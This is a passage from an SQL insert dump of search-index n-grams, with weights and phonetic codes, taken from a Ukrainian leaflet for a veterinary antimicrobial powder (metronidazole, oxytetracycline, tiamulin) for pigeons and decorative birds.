spp','salmonella spp',0,1,1.4667,'S45421',2,'*'),(1536000,'salmonella spp staphylococcus','salmonella spp staphylococcus',0,1,1.9667,'S4542123142',1,'*'),(1536001,'serpulina','serpulina',0,0,0.6,'S6145',1,'*'),(1536002,'serpulina spp','serpulina spp',0,1,1.4333,'S614521',1,'*'),(1536003,'serpulina spp хламідій','serpulina spp хламідій',0,1,1.7333,'S614521',1,'*'),(1536004,'spp','spp',0,0,0.2,'S100',3,'*'),(1536005,'spp e','spp e',0,1,1.1667,'S100',1,'*'),(1536006,'spp e сoli','spp e сoli',0,1,1.3333,'S140',1,'*'),(1536007,'spp histomonas','spp histomonas',0,1,1.4667,'S12352',1,'*'),(1536008,'spp histomonas meleagridis','spp histomonas meleagridis',0,1,1.8667,'S12352542632',1,'*'),(1536009,'spp pasteurella','spp pasteurella',0,1,1.5,'S12364',1,'*'),(1536010,'spp pasteurella multocida','spp pasteurella multocida',0,1,1.8333,'S1236454323',1,'*'),(1536011,'spp pasteurella spp','spp pasteurella spp',0,1,1.6333,'S1236421',1,'*'),(1536012,'spp salmonella','spp salmonella',0,1,1.4667,'S12454',1,'*'),(1536013,'spp salmonella spp','spp salmonella spp',0,1,1.6,'S1245421',1,'*'),(1536014,'spp staphylococcus','spp staphylococcus',0,1,1.6,'S123142',1,'*'),(1536015,'spp staphylococcus spp','spp staphylococcus spp',0,1,1.7333,'S1231421',1,'*'),(1536016,'spp streptococcus','spp streptococcus',0,1,1.5667,'S1236132',1,'*'),(1536017,'spp streptococcus spp','spp streptococcus spp',0,1,1.7,'S12361321',1,'*'),(1536018,'spp деяких','spp деяких',0,1,1.3333,'S100',1,'*'),(1536019,'spp деяких простіших','spp деяких простіших',0,1,1.6667,'S100',1,'*'),(1536020,'spp мікоплазм','spp мікоплазм',0,1,1.4333,'S100',1,'*'),(1536021,'spp мікоплазм mycoplasma','spp мікоплазм mycoplasma',0,1,1.8,'S1521425',1,'*'),(1536022,'spp метронідазол','spp метронідазол',0,1,1.5333,'S100',1,'*'),(1536023,'spp метронідазол ефективний','spp метронідазол ефективний',0,1,1.9,'S100',1,'*'),(1536024,'spp спірохет','spp спірохет',0,1,1.4,'S100',1,'*'),(1536025,'spp спірохет serpulina','spp спірохет serpulina',0,1,1.7333,'S126145',1,'*'),(1536026,'spp спектр','spp спектр',0,1,1.3333,'S100',1,'*'),(1536027,'spp спектр дії','spp спектр дії',0,1,1.4667,'S100',1,'*'),(1536028,'spp тіамулін','spp тіамулін',0,1,1.4,'S100',1,'*'),(1536029,'spp тіамулін діє','spp тіамулін діє',0,1,1.5333,'S100',1,'*'),(1536030,'spp хламідій','spp хламідій',0,1,1.4,'S100',1,'*'),(1536031,'spp хламідій chlamydia','spp хламідій chlamydia',0,1,1.7333,'S12453',1,'*'),(1536032,'staphylococcus','staphylococcus',0,0,0.9333,'S3142',2,'*'),(1536033,'staphylococcus spp','staphylococcus spp',0,1,1.6,'S31421',1,'*'),(1536034,'staphylococcus spp streptococcus','staphylococcus spp streptococcus',0,1,2,'S31421236132',1,'*'),(1536035,'streptococcus','streptococcus',0,0,0.8667,'S36132',2,'*'),(1536036,'streptococcus spp','streptococcus spp',0,1,1.5667,'S361321',1,'*'),(1536037,'streptococcus spp метронідазол','streptococcus spp метронідазол',0,1,2,'S361321',1,'*'),(1536038,'streptococcus spp тіамулін','streptococcus spp тіамулін',0,1,1.8667,'S361321',1,'*'),(1536039,'t','t',0,0,0.0667,'T000',1,'*'),(1536040,'t gallinae','t gallinae',0,1,1.3333,'T245',1,'*'),(1536041,'t gallinae лямблій','t gallinae лямблій',0,1,1.6,'T245',1,'*'),(1536042,'timoks','timoks',0,0,0.4,'T520',1,'*'),(1536043,'timoks kompleksnij','timoks kompleksnij',0,1,1.6,'T52514252',1,'*'),(1536044,'timoks kompleksnij preparat','timoks kompleksnij preparat',0,1,1.9,'T5251425216163',1,'*'),(1536045,'trichomonas','trichomonas',0,0,0.7333,'T6252',3,'*'),(1536046,'trichomonas columbae','trichomonas columbae',0,1,1.6667,'T6252451',1,'*'),(1536047,'trichomonas columbae t','trichomonas columbae t',0,1,1.7333,'T62524513',1,'*'),(1536048,'і вторинних','і вторинних',0,1,1.3667,'і000',1,'*'),(1536049,'і вторинних інфекцій','і вторинних інфекцій',0,1,1.6667,'і000',1,'*'),(1536050,'їжу','їжу',0,0,0.2,'ї000',2,'*'),(1536051,'їжу людиною','їжу людиною',0,1,1.3667,'ї000',1,'*'),(1536052,'їжу людиною підвищена','їжу людиною підвищена',0,1,1.7,'ї000',1,'*'),(1536053,'із','із',0,0,0.1333,'і000',15,'*'),(1536054,'із специфічним','із специфічним',0,1,1.4667,'і000',2,'*'),(1536055,'із специфічним запахом','із специфічним запахом',0,1,1.7333,'і000',2,'*'),(1536056,'індивідуальна','індивідуальна',0,0,0.8667,'і000',1,'*'),(1536057,'індивідуальна чутливість','індивідуальна чутливість',0,1,1.8,'і000',1,'*'),(1536058,'індивідуальна чутливість до','індивідуальна чутливість до',0,1,1.9,'і000',1,'*'),(1536059,'інфекцій','інфекцій',0,0,0.5333,'і000',1,'*'),(1536060,'інфекцій зумовлених','інфекцій зумовлених',0,1,1.6333,'і000',1,'*'),(1536061,'інфекцій зумовлених мікроорганізмами','інфекцій зумовлених мікроорганізмами',0,1,2,'і000',1,'*'),(1536062,'а також','а також',0,1,1.2333,'а000',4,'*'),(1536063,'а також деяких','а також деяких',0,1,1.4667,'а000',1,'*'),(1536064,'аеробних','аеробних',0,0,0.5333,'а000',1,'*'),(1536065,'аеробних грам-позитивних','аеробних грам-позитивних',0,1,1.8,'а000',1,'*'),(1536066,'аеробних грам-позитивних та','аеробних грам-позитивних та',0,1,1.9,'а000',1,'*'),(1536067,'амеби','амеби',0,0,0.3333,'а000',1,'*'),(1536068,'амеби застосування','амеби застосування',0,1,1.6,'а000',1,'*'),(1536069,'амеби застосування для','амеби застосування для',0,1,1.7333,'а000',1,'*'),(1536070,'анаеробів','анаеробів',0,0,0.6,'а000',1,'*'),(1536071,'анаеробів хламідій','анаеробів хламідій',0,1,1.6,'а000',1,'*'),(1536072,'анаеробів хламідій chlamidia','анаеробів хламідій chlamidia',0,1,1.9333,'а2453',1,'*'),(1536073,'антибіотик','антибіотик',0,0,0.6667,'а000',2,'*'),(1536074,'антибіотик широкого','антибіотик широкого',0,1,1.6333,'а000',1,'*'),(1536075,'антибіотик широкого спектру','антибіотик широкого спектру',0,1,1.9,'а000',1,'*'),(1536076,'бактерій','бактерій',0,0,0.5333,'б000',1,'*'),(1536077,'бактерій а','бактерій а',0,1,1.3333,'б000',1,'*'),(1536078,'бактерій а також','бактерій а також',0,1,1.5333,'б000',1,'*'),(1536079,'бактеріостатично','бактеріостатично',0,0,1,'б000',1,'*'),(1536080,'бактеріостатично щодо','бактеріостатично щодо',0,1,1.7,'б000',1,'*'),(1536081,'бактеріостатично щодо мікоплазм','бактеріостатично щодо мікоплазм',0,1,2,'б000',1,'*'),(1536082,'в їжу','в їжу',0,1,1.1667,'в000',2,'*'),(1536083,'в їжу людиною','в їжу людиною',0,1,1.4333,'в000',1,'*'),(1536084,'від 5','від 5',0,1,1.1667,'в000',4,'*'),(1536085,'від 5 до','від 5 до',0,1,1.2667,'в000',3,'*'),(1536086,'використання','використання',0,0,0.8,'в000',2,'*'),(1536087,'використання в','використання в',0,1,1.4667,'в000',1,'*'),(1536088,'використання в їжу','використання в їжу',0,1,1.6,'в000',1,'*'),(1536089,'випуску фольговані','випуску фольговані',0,1,1.6,'в000',2,'*'),(1536090,'випуску фольговані пакети','випуску фольговані пакети',0,1,1.8333,'в000',2,'*'),(1536091,'виробник готового','виробник готового',0,1,1.5667,'в000',2,'*'),(1536092,'виробник готового продукту','виробник готового продукту',0,1,1.8667,'в000',2,'*'),(1536093,'властивостi окситетрациклін','властивостi окситетрациклін',0,1,1.9,'в000',1,'*'),(1536094,'властивостi окситетрациклін антибіотик','властивостi окситетрациклін антибіотик',0,1,2,'в000',1,'*'),(1536095,'води щоденно','води щоденно',0,1,1.4,'в000',1,'*'),(1536096,'води щоденно протягом','води щоденно протягом',0,1,1.7,'в000',1,'*'),(1536097,'водою','водою',0,0,0.3333,'в000',4,'*'),(1536098,'водою груповим','водою груповим',0,1,1.4667,'в000',1,'*'),(1536099,'водою груповим способом','водою груповим способом',0,1,1.7667,'в000',1,'*'),(1536100,'вторинних','вторинних',0,0,0.6,'в000',1,'*'),(1536101,'вторинних інфекцій','вторинних інфекцій',0,1,1.6,'в000',1,'*'),(1536102,'вторинних інфекцій зумовлених','вторинних інфекцій зумовлених',0,1,1.9667,'в000',1,'*'),(1536103,'г зберігання','г зберігання',0,1,1.4,'г000',2,'*'),(1536104,'г зберігання сухе','г зберігання сухе',0,1,1.5667,'г000',2,'*'),(1536105,'г містить','г містить',0,1,1.3,'г000',1,'*'),(1536106,'г містить діючі','г містить діючі',0,1,1.5,'г000',1,'*'),(1536107,'г препарату','г препарату',0,1,1.3667,'г000',2,'*'),(1536108,'г препарату на','г препарату на',0,1,1.4667,'г000',2,'*'),(1536109,'гідроген','гідроген',0,0,0.5333,'г000',1,'*'),(1536110,'гідроген фумарат','гідроген фумарат',0,1,1.5333,'г000',1,'*'),(1536111,'гідроген фумарат 50','гідроген фумарат 50',0,1,1.6333,'г000',1,'*'),(1536112,'гідрохлорид','гідрохлорид',0,0,0.7333,'г000',1,'*'),(1536113,'гідрохлорид 60','гідрохлорид 60',0,1,1.4667,'г000',1,'*'),(1536114,'гідрохлорид 60 мг','гідрохлорид 60 мг',0,1,1.5667,'г000',1,'*'),(1536115,'гістомонозу','гістомонозу',0,0,0.7333,'г000',1,'*'),(1536116,'гістомонозу еймеріозу','гістомонозу еймеріозу',0,1,1.7,'г000',1,'*'),(1536117,'гістомонозу еймеріозу сальмонельозу','гістомонозу еймеріозу сальмонельозу',0,1,2,'г000',1,'*'),(1536118,'глюкоза','глюкоза',0,0,0.4667,'г000',1,'*'),(1536119,'глюкоза фармакологiчнi','глюкоза фармакологiчнi',0,1,1.7333,'г000',1,'*'),(1536120,'глюкоза фармакологiчнi властивостi','глюкоза фармакологiчнi властивостi',0,1,2,'г000',1,'*'),(1536121,'голубів та','голубів та',0,1,1.3333,'г000',2,'*'),(1536122,'голубів та декоративних','голубів та декоративних',0,1,1.7667,'г000',2,'*'),(1536123,'готового','готового',0,0,0.5333,'г000',2,'*'),(1536124,'готового продукту','готового продукту',0,1,1.5667,'г000',2,'*'),(1536125,'готового продукту пп','готового продукту пп',0,1,1.6667,'г000',2,'*'),(1536126,'грам-негативних','грам-негативних',0,0,1,'г000',1,'*'),(1536127,'грам-негативних бактерій','грам-негативних бактерій',0,1,1.8,'г000',1,'*'),(1536128,'грам-негативних бактерій а','грам-негативних бактерій а',0,1,1.8667,'г000',1,'*'),(1536129,'грам-позитивних','грам-позитивних',0,0,1,'г000',1,'*'),(1536130,'грам-позитивних та','грам-позитивних та',0,1,1.6,'г000',1,'*'),(1536131,'грам-позитивних та грам-негативних','грам-позитивних та грам-негативних',0,1,2,'г000',1,'*'),(1536132,'груповим','груповим',0,0,0.5333,'г000',1,'*'),(1536133,'груповим способом','груповим способом',0,1,1.5667,'г000',1,'*'),(1536134,'груповим способом у','груповим способом у',0,1,1.6333,'г000',1,'*'),(1536135,'діє','діє',0,0,0.2,'д000',3,'*'),(1536136,'діє бактеріостатично','діє бактеріостатично',0,1,1.6667,'д000',1,'*'),(1536137,'діє бактеріостатично щодо','діє бактеріостатично щодо',0,1,1.8333,'д000',1,'*'),(1536138,'дії','дії',0,0,0.2,'д000',2,'*'),(1536139,'дії ефективний','дії ефективний',0,1,1.4667,'д000',1,'*'),(1536140,'дії ефективний проти','дії ефективний проти',0,1,1.6667,'д000',1,'*'),(1536141,'дії комбінації','дії комбінації',0,1,1.4667,'д000',1,'*'),(1536142,'дії комбінації метронідазолу','дії комбінації метронідазолу',0,1,1.9333,'д000',1,'*'),(1536143,'дії поширюється','дії поширюється',0,1,1.5,'д000',1,'*'),(1536144,'дії поширюється також','дії поширюється також',0,1,1.7,'д000',1,'*'),(1536145,'діб','діб',0,0,0.2,'д000',3,'*'),(1536146,'дітей','дітей',0,0,0.3333,'д000',7,'*'),(1536147,'дітей місце','дітей місце',0,1,1.3667,'д000',4,'*'),(1536148,'дітей місце за','дітей місце за',0,1,1.4667,'д000',3,'*'),(1536149,'діючі','діючі',0,0,0.3333,'д000',1,'*'),(1536150,'діючі речовини','діючі речовини',0,1,1.4667,'д000',1,'*'),(1536151,'діючі речовини метронідазол','діючі речовини метронідазол',0,1,1.9,'д000',1,'*'),(1536152,'декоративних','декоративних',0,0,0.8,'д000',3,'*'),(1536153,'декоративних птахів','декоративних птахів',0,1,1.6333,'д000',3,'*'),(1536154,'декоративних птахів гістомонозу','декоративних птахів гістомонозу',0,1,2,'д000',1,'*'),(1536155,'деяких','деяких',0,0,0.4,'д000',1,'*'),(1536156,'деяких анаеробів','деяких анаеробів',0,1,1.5333,'д000',1,'*'),(1536157,'деяких анаеробів хламідій','деяких анаеробів хламідій',0,1,1.8333,'д000',1,'*'),(1536158,'деяких простіших','деяких простіших',0,1,1.5333,'д000',1,'*'),(1536159,'деяких простіших та','деяких простіших та',0,1,1.6333,'д000',1,'*'),(1536160,'для використання','для використання',0,1,1.5333,'д000',1,'*'),(1536161,'для використання в','для використання в',0,1,1.6,'д000',1,'*'),(1536162,'для дітей','для дітей',0,1,1.3,'д000',5,'*'),(1536163,'для дітей місце','для дітей місце',0,1,1.5,'д000',4,'*'),(1536164,'для профілактики','для профілактики',0,1,1.5333,'д000',3,'*'),(1536165,'для профілактики та','для профілактики та',0,1,1.6333,'д000',2,'*'),(1536166,'до 25','до 25',0,1,1.1667,'д000',6,'*'),(1536167,'до 25 с','до 25 с',0,1,1.2333,'д000',6,'*'),(1536168,'до дії','до дії',0,1,1.2,'д000',1,'*'),(1536169,'до дії комбінації','до дії комбінації',0,1,1.5667,'д000',1,'*'),(1536170,'до окситетрацикліну','до окситетрацикліну',0,1,1.6333,'д000',1,'*'),(1536171,'до окситетрацикліну метронідазолу','до окситетрацикліну метронідазолу',0,1,2,'д000',1,'*'),(1536172,'дозі','дозі',0,0,0.2667,'д000',1,'*'),(1536173,'дозі 1-2','дозі 1-2',0,1,1.2667,'д000',1,'*'),(1536174,'дозі 1-2 г','дозі 1-2 г',0,1,1.3333,'д000',1,'*'),(1536175,'дозування препарат','дозування препарат',0,1,1.6,'д000',3,'*'),(1536176,'дозування препарат задають','дозування препарат задають',0,1,1.8667,'д000',1,'*'),(1536177,'допоміжна','допоміжна',0,0,0.6,'д000',1,'*'),(1536178,'допоміжна речовина','допоміжна речовина',0,1,1.6,'д000',1,'*'),(1536179,'допоміжна речовина глюкоза','допоміжна речовина глюкоза',0,1,1.8667,'д000',1,'*'),(1536180,'еймеріозу','еймеріозу',0,0,0.6,'е000',1,'*'),(1536181,'еймеріозу сальмонельозу','еймеріозу сальмонельозу',0,1,1.7667,'е000',1,'*'),(1536182,'еймеріозу сальмонельозу тріхомонозу','еймеріозу сальмонельозу тріхомонозу',0,1,2,'е000',1,'*'),(1536183,'ефективний','ефективний',0,0,0.6667,'е000',1,'*'),(1536184,'ефективний проти','ефективний проти',0,1,1.5333,'е000',1,'*'),(1536185,'ефективний проти eimeria','ефективний проти eimeria',0,1,1.8,'е560',1,'*'),(1536186,'ефективний проти аеробних','ефективний проти аеробних',0,1,1.8333,'е000',1,'*'),(1536187,'жовтого','жовтого',0,0,0.4667,'ж000',2,'*'),(1536188,'жовтого кольору','жовтого кольору',0,1,1.5,'ж000',1,'*'),(1536189,'жовтого кольору із','жовтого кольору із',0,1,1.6,'ж000',1,'*'),(1536190,'з водою','з водою',0,1,1.2333,'з000',1,'*'),(1536191,'з водою груповим','з водою груповим',0,1,1.5333,'з000',1,'*'),(1536192,'за температури','за температури',0,1,1.4667,'з000',3,'*'),(1536193,'за температури від','за температури від',0,1,1.6,'з000',3,'*'),(1536194,'задають','задають',0,0,0.4667,'з000',2,'*'),(1536195,'задають усуміші','задають усуміші',0,1,1.5,'з000',1,'*'),(1536196,'задають усуміші з','задають усуміші з',0,1,1.5667,'з000',1,'*'),(1536197,'запахом','запахом',0,0,0.4667,'з000',2,'*'),(1536198,'запахом склад','запахом склад',0,1,1.4333,'з000',1,'*'),(1536199,'запахом склад 1','запахом склад 1',0,1,1.5,'з000',1,'*'),(1536200,'застосовувати м','застосовувати м',0,1,1.5,'з000',1,'*'),(1536201,'застосовувати м ясо','застосовувати м ясо',0,1,1.6333,'з000',1,'*'),(1536202,'застосовувати продуктивним','застосовувати продуктивним',0,1,1.8667,'з000',1,'*'),(1536203,'застосовувати продуктивним тваринам','застосовувати продуктивним тваринам',0,1,2,'з000',1,'*'),(1536204,'застосування для','застосування для',0,1,1.5333,'з000',2,'*'),(1536205,'застосування для профілактики','застосування для профілактики',0,1,1.9667,'з000',1,'*'),(1536206,'зберігання','зберігання',0,0,0.6667,'з000',4,'*'),(1536207,'зберігання сухе','зберігання сухе',0,1,1.5,'з000',4,'*'),(1536208,'зберігання сухе темне','зберігання сухе темне',0,1,1.7,'з000',3,'*'),(1536209,'зумовлених','зумовлених',0,0,0.6667,'з000',1,'*'),(1536210,'зумовлених мікроорганізмами','зумовлених мікроорганізмами',0,1,1.9,'з000',1,'*'),(1536211,'зумовлених мікроорганізмами чутливими','зумовлених мікроорганізмами чутливими',0,1,2,'з000',1,'*'),(1536212,'кольору','кольору',0,0,0.4667,'к000',4,'*'),(1536213,'кольору із','кольору із',0,1,1.3333,'к000',2,'*'),(1536214,'кольору із специфічним','кольору із специфічним',0,1,1.7333,'к000',2,'*'),(1536215,'комбінації','комбінації',0,0,0.6667,'к000',1,'*'),(1536216,'комбінації метронідазолу','комбінації метронідазолу',0,1,1.8,'к000',1,'*'),(1536217,'комбінації метронідазолу окситетрацикліну','комбінації метронідазолу окситетрацикліну',0,1,2,'к000',1,'*'),(1536218,'комплексний','комплексний',0,0,0.7333,'к000',1,'*'),(1536219,'комплексний препарат','комплексний препарат',0,1,1.6667,'к000',1,'*'),(1536220,'л','л',0,0,0.0667,'л000',5,'*'),(1536221,'л води','л води',0,1,1.2,'л000',2,'*'),(1536222,'л води щоденно','л води щоденно',0,1,1.4667,'л000',1,'*'),(1536223,'лікування','лікування',0,0,0.6,'л000',6,'*'),(1536224,'лікування у','лікування у',0,1,1.3667,'л000',1,'*'),(1536225,'лікування у голубів','лікування у голубів',0,1,1.6333,'л000',1,'*'),(1536226,'людиною','людиною',0,0,0.4667,'л000',1,'*'),(1536227,'людиною підвищена','людиною підвищена',0,1,1.5667,'л000',1,'*'),(1536228,'людиною підвищена індивідуальна','людиною підвищена індивідуальна',0,1,2,'л000',1,'*'),(1536229,'лямблій','лямблій',0,0,0.4667,'л000',1,'*'),(1536230,'лямблій lamblia','лямблій lamblia',0,1,1.5,'л4514',1,'*'),(1536231,'лямблій lamblia intestinalis','лямблій lamblia intestinalis',0,1,1.9333,'л45145323542',1,'*'),(1536232,'м ясо','м ясо',0,1,1.1667,'м000',1,'*'),(1536233,'м ясо та','м ясо та',0,1,1.2667,'м000',1,'*'),(1536234,'мікоплазм','мікоплазм',0,0,0.6,'м000',1,'*'),(1536235,'мікоплазм mycoplasma','мікоплазм mycoplasma',0,1,1.6667,'м521425',1,'*'),(1536236,'мікоплазм mycoplasma spp','мікоплазм mycoplasma spp',0,1,1.8,'м52142521',1,'*'),(1536237,'мікроорганізмами','мікроорганізмами',0,0,1,'м000',1,'*'),(1536238,'мікроорганізмами чутливими','мікроорганізмами чутливими',0,1,1.8667,'м000',1,'*'),(1536239,'мікроорганізмами чутливими до','мікроорганізмами чутливими до',0,1,1.9667,'м000',1,'*'),(1536240,'містить діючі','містить діючі',0,1,1.4333,'м000',1,'*'),(1536241,'містить діючі речовини','містить діючі речовини',0,1,1.7333,'м000',1,'*'),(1536242,'місце','місце',0,0,0.3333,'м000',8,'*'),(1536243,'місце за','місце за',0,1,1.2667,'м000',4,'*'),(1536244,'місце за температури','місце за температури',0,1,1.6667,'м000',3,'*'),(1536245,'мг допоміжна','мг допоміжна',0,1,1.4,'м000',1,'*'),(1536246,'мг допоміжна речовина','мг допоміжна речовина',0,1,1.7,'м000',1,'*'),(1536247,'мг окситетрациклін','мг окситетрациклін',0,1,1.6,'м000',1,'*'),(1536248,'мг окситетрациклін гідрохлорид','мг окситетрациклін гідрохлорид',0,1,2,'м000',1,'*'),(1536249,'мг тіамулін','мг тіамулін',0,1,1.3667,'м000',1,'*'),(1536250,'мг тіамулін гідроген','мг тіамулін гідроген',0,1,1.6667,'м000',1,'*'),(1536251,'медицині виробник готового','медицині виробник готового',0,1,1.8667,'м000',1,'*'),(1536252,'метронідазол','метронідазол',0,0,0.8,'м000',3,'*'),(1536253,'метронідазол 20','метронідазол 20',0,1,1.5,'м000',2,'*'),(1536254,'метронідазол 20 мг','метронідазол 20 мг',0,1,1.6,'м000',1,'*'),(1536255,'метронідазол ефективний','метронідазол ефективний',0,1,1.7667,'м000',1,'*'),(1536256,'метронідазол ефективний проти','метронідазол ефективний проти',0,1,1.9667,'м000',1,'*'),(1536257,'метронідазолу','метронідазолу',0,0,0.8667,'м000',1,'*'),(1536258,'метронідазолу окситетрацикліну','метронідазолу окситетрацикліну',0,1,2,'м000',1,'*'),(1536259,'метронідазолу окситетрацикліну та','метронідазолу окситетрацикліну та',0,1,2,'м000',1,'*'),(1536260,'метронідазолу та','метронідазолу та',0,1,1.5333,'м000',1,'*'),(1536261,'метронідазолу та тіамуліну','метронідазолу та тіамуліну',0,1,1.8667,'м000',1,'*'),(1536262,'на 1 л','на 1 л',0,1,1.2,'н000',2,'*'),(1536263,'на actinobacillus','на actinobacillus',0,1,1.5667,'н2351242',1,'*'),(1536264,'на actinobacillus spp','на actinobacillus spp',0,1,1.7,'н23512421',1,'*'),(1536265,'не застосовувати','не застосовувати',0,1,1.5333,'н000',4,'*'),(1536266,'не застосовувати м','не застосовувати м',0,1,1.6,'н000',1,'*'),(1536267,'не застосовувати продуктивним','не застосовувати продуктивним',0,1,1.9667,'н000',1,'*'),(1536268,'недоступне','недоступне',0,0,0.6667,'н000',4,'*'),(1536269,'недоступне для','недоступне для',0,1,1.4667,'н000',4,'*'),(1536270,'недоступне для дітей','недоступне для дітей',0,1,1.6667,'н000',4,'*'),(1536271,'окситетрациклін','окситетрациклін',0,0,1,'о000',1,'*'),(1536272,'окситетрациклін антибіотик','окситетрациклін антибіотик',0,1,1.8667,'о000',1,'*'),(1536273,'окситетрациклін антибіотик широкого','окситетрациклін антибіотик широкого',0,1,2,'о000',1,'*'),(1536274,'окситетрациклін гідрохлорид','окситетрациклін гідрохлорид',0,1,1.9,'о000',1,'*'),(1536275,'окситетрациклін гідрохлорид 60','окситетрациклін гідрохлорид 60',0,1,2,'о000',1,'*'),(1536276,'окситетрацикліну','окситетрацикліну',0,0,1,'о000',1,'*'),(1536277,'окситетрацикліну метронідазолу','окситетрацикліну метронідазолу',0,1,2,'о000',1,'*'),(1536278,'окситетрацикліну метронідазолу та','окситетрацикліну метронідазолу та',0,1,2,'о000',1,'*'),(1536279,'окситетрацикліну та','окситетрацикліну та',0,1,1.6333,'о000',1,'*'),(1536280,'окситетрацикліну та тіамуліну','окситетрацикліну та тіамуліну',0,1,1.9667,'о000',1,'*'),(1536281,'опис порошок','опис порошок',0,1,1.4,'о000',2,'*'),(1536282,'опис порошок жовтого','опис порошок жовтого',0,1,1.6667,'о000',1,'*'),(1536283,'підвищена','підвищена',0,0,0.6,'п000',2,'*'),(1536284,'підвищена індивідуальна','підвищена індивідуальна',0,1,1.7667,'п000',1,'*'),(1536285,'підвищена індивідуальна чутливість','підвищена індивідуальна чутливість',0,1,2,'п000',1,'*'),(1536286,'пакети по','пакети по',0,1,1.3,'п000',3,'*'),(1536287,'пакети по 10','пакети по 10',0,1,1.4,'п000',2,'*'),(1536288,'первинних','первинних',0,0,0.6,'п000',1,'*'),(1536289,'первинних і','первинних і',0,1,1.3667,'п000',1,'*'),(1536290,'первинних і вторинних','первинних і вторинних',0,1,1.7,'п000',1,'*'),(1536291,'по 10','по 10',0,1,1.1667,'п000',3,'*'),(1536292,'по 10 100','по 10 100',0,1,1.3,'п000',1,'*'),(1536293,'порошок жовтого','порошок жовтого',0,1,1.5,'п000',1,'*'),(1536294,'порошок жовтого кольору','порошок жовтого кольору',0,1,1.7667,'п000',1,'*'),(1536295,'поширюється','поширюється',0,0,0.7333,'п000',1,'*'),(1536296,'поширюється також','поширюється також',0,1,1.5667,'п000',1,'*'),(1536297,'поширюється також на','поширюється також на',0,1,1.6667,'п000',1,'*'),(1536298,'препарат','препарат',0,0,0.5333,'п000',7,'*'),(1536299,'препарат задають','препарат задають',0,1,1.5333,'п000',1,'*'),(1536300,'препарат задають усуміші','препарат задають усуміші',0,1,1.8,'п000',1,'*'),(1536301,'препарату на','препарату на',0,1,1.4,'п000',3,'*'),(1536302,'препарату на 1','препарату на 1',0,1,1.4667,'п000',2,'*'),(1536303,'придатності 2','придатності 2',0,1,1.4333,'п000',3,'*'),(1536304,'придатності 2 роки','придатності 2 роки',0,1,1.6,'п000',3,'*'),(1536305,'призначених','призначених',0,0,0.7333,'п000',2,'*'),(1536306,'призначених для','призначених для',0,1,1.5,'п000',2,'*'),(1536307,'призначених для використання','призначених для використання',0,1,1.9333,'п000',1,'*'),(1536308,'продуктивним','продуктивним',0,0,0.8,'п000',1,'*'),(1536309,'продуктивним тваринам','продуктивним тваринам',0,1,1.7,'п000',1,'*'),(1536310,'продуктивним тваринам не','продуктивним тваринам не',0,1,1.8,'п000',1,'*'),(1536311,'продукцію','продукцію',0,0,0.6,'п000',1,'*'),(1536312,'продукцію тварин','продукцію тварин',0,1,1.5333,'п000',1,'*'),(1536313,'продукцію тварин та','продукцію тварин та',0,1,1.6333,'п000',1,'*'),(1536314,'простіших','простіших',0,0,0.6,'п000',1,'*'),(1536315,'простіших та','простіших та',0,1,1.4,'п000',1,'*'),(1536316,'простіших та рикетсій','простіших та рикетсій',0,1,1.7,'п000',1,'*'),(1536317,'проти','проти',0,0,0.3333,'п000',1,'*'),(1536318,'проти eimeria','проти eimeria',0,1,1.4333,'п560',1,'*'),(1536319,'проти eimeria spp','проти eimeria spp',0,1,1.5667,'п5621',1,'*'),(1536320,'проти аеробних','проти аеробних',0,1,1.4667,'п000',1,'*'),(1536321,'проти аеробних грам-позитивних','проти аеробних грам-позитивних',0,1,2,'п000',1,'*'),(1536322,'протипоказання не застосовувати','протипоказання не застосовувати',0,1,2,'п000',2,'*'),(1536323,'протягом 5-6','протягом 5-6',0,1,1.4,'п000',1,'*'),(1536324,'протягом 5-6 діб','протягом 5-6 діб',0,1,1.5333,'п000',1,'*'),(1536325,'профілактики','профілактики',0,0,0.8,'п000',4,'*'),(1536326,'профілактики та','профілактики та',0,1,1.5,'п000',2,'*'),(1536327,'профілактики та лікування','профілактики та лікування',0,1,1.8333,'п000',2,'*'),(1536328,'птахів гістомонозу','птахів гістомонозу',0,1,1.6,'п000',1,'*'),(1536329,'птахів гістомонозу еймеріозу','птахів гістомонозу еймеріозу',0,1,1.9333,'п000',1,'*'),(1536330,'птиці','птиці',0,0,0.3333,'п000',4,'*'),(1536331,'птиці призначених','птиці призначених',0,1,1.5667,'п000',1,'*'),(1536332,'птиці призначених для','птиці призначених для',0,1,1.7,'п000',1,'*'),(1536333,'речовина','речовина',0,0,0.5333,'р000',2,'*'),(1536334,'речовина глюкоза','речовина глюкоза',0,1,1.5333,'р000',1,'*'),(1536335,'речовина глюкоза фармакологiчнi','речовина глюкоза фармакологiчнi',0,1,2,'р000',1,'*'),(1536336,'речовини','речовини',0,0,0.5333,'р000',2,'*'),(1536337,'речовини метронідазол','речовини метронідазол',0,1,1.7,'р000',1,'*'),(1536338,'речовини метронідазол 20','речовини метронідазол 20',0,1,1.8,'р000',1,'*'),(1536339,'рикетсій','рикетсій',0,0,0.5333,'р000',1,'*'),(1536340,'рикетсій rickettsia','рикетсій rickettsia',0,1,1.6333,'р6232',1,'*'),(1536341,'рикетсій rickettsia spp','рикетсій rickettsia spp',0,1,1.7667,'р62321',1,'*'),(1536342,'роки','роки',0,0,0.2667,'р000',3,'*'),(1536343,'роки для','роки для',0,1,1.2667,'р000',1,'*'),(1536344,'роки для застосування','роки для застосування',0,1,1.7,'р000',1,'*'),(1536345,'с термін','с термін',0,1,1.2667,'с000',5,'*'),(1536346,'с термін придатності','с термін придатності',0,1,1.6667,'с000',5,'*'),(1536347,'сoli','сoli',0,0,0.2667,'с400',1,'*'),(1536348,'сoli klebsiella','сoli klebsiella',0,1,1.5,'с424124',1,'*'),(1536349,'сoli klebsiella spp','сoli klebsiella spp',0,1,1.6333,'с42412421',1,'*'),(1536350,'сальмонельозу','сальмонельозу',0,0,0.8667,'с000',1,'*'),(1536351,'сальмонельозу тріхомонозу','сальмонельозу тріхомонозу',0,1,1.8333,'с000',1,'*'),(1536352,'сальмонельозу тріхомонозу та','сальмонельозу тріхомонозу та',0,1,1.9333,'с000',1,'*'),(1536353,'склад 1 г','склад 1 г',0,1,1.3,'с000',2,'*'),(1536354,'спірохет','спірохет',0,0,0.5333,'с000',1,'*'),(1536355,'спірохет serpulina','спірохет serpulina',0,1,1.6,'с26145',1,'*'),(1536356,'спірохет serpulina spp','спірохет serpulina spp',0,1,1.7333,'с2614521',1,'*'),(1536357,'спектр','спектр',0,0,0.4,'с000',3,'*'),(1536358,'спектр дії','спектр дії',0,1,1.3333,'с000',1,'*'),(1536359,'спектр дії поширюється','спектр дії поширюється',0,1,1.7333,'с000',1,'*'),(1536360,'спектру','спектру',0,0,0.4667,'с000',1,'*'),(1536361,'спектру 